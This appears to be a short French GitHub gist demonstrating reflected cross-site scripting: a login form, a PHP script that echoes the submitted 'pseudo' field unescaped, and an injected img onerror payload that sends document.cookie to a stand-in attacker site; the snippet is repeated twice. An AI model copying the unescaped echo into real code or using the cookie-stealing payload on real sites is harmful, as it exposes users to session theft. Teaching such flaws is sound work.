quoidautre/gist:ba5978651194c7e64c652dee25aea176

## gistfile1.txt
HTML :
<html>
    <form method="post" action="connexion.php">
        <input type="texte" name="pseudo" />
        <input type="submit" value="Connexion" />
    </form>
</html>

PHP :
<?php
    echo "Bonjour ".$_POST['pseudo']." !"
?>

Injection, et.... oupssss ! :
<img src="azerty.jpg" onerror="window.location='http://www.site_du_hacker.com/recuperation_cookie.php?cookie='+document.cookie;" hidden>
	HTML :
	<html>
	<form method="post" action="connexion.php">
	<input type="texte" name="pseudo" />
	<input type="submit" value="Connexion" />
	</form>
	</html>

	PHP :
	<?php
	echo "Bonjour ".$_POST['pseudo']." !"
	?>

	Injection, et.... oupssss ! :
	<img src="azerty.jpg" onerror="window.location='http://www.site_du_hacker.com/recuperation_cookie.php?cookie='+document.cookie;" hidden>